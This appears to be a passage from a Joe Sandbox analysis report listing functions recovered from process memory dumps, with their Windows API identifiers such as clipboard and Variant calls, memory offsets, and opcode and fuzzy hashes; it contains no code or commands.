                                                                                                                                                                                                                                                                          Function 00B1C268 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                          • Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                                                          Function 00B0559D Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                          • Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
                                                                                                                                                                                                                                                                          Function 00B1C79B Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                          • Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                                                          Function 00B11337 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                          • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                          • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                          • Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                          • Instruction ID: cc5e03ee11ac258a935ab62de4ea8fae1d24afeb11ab974c19f129201c6544c8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48419F7050C7818ED301AF7C998835FBEE09F86314F488A7DE5EA86392D6788588C793
                                                                                                                                                                                                                                                                          Function 004310D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                          • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                          • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                          • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                          • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                                                                                                                                                                                                                                          Function 00B0FAA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                          • String ID: L
                                                                                                                                                                                                                                                                          • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                          • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                          • Instruction ID: 0939f7048941c7fe71b3dfa4cf9a86e805982586101f02f187da32c0f3914e66
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD412B7110CBC18ED331DB38845865EBFD1ABE6220F188A9CE5F5873E2D6748549CB53
                                                                                                                                                                                                                                                                          Function 0042F83B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                          • String ID: L
                                                                                                                                                                                                                                                                          • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                          • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                          • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                                                                                                                                                                                                                                          Function 004322BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                          • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                                          • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86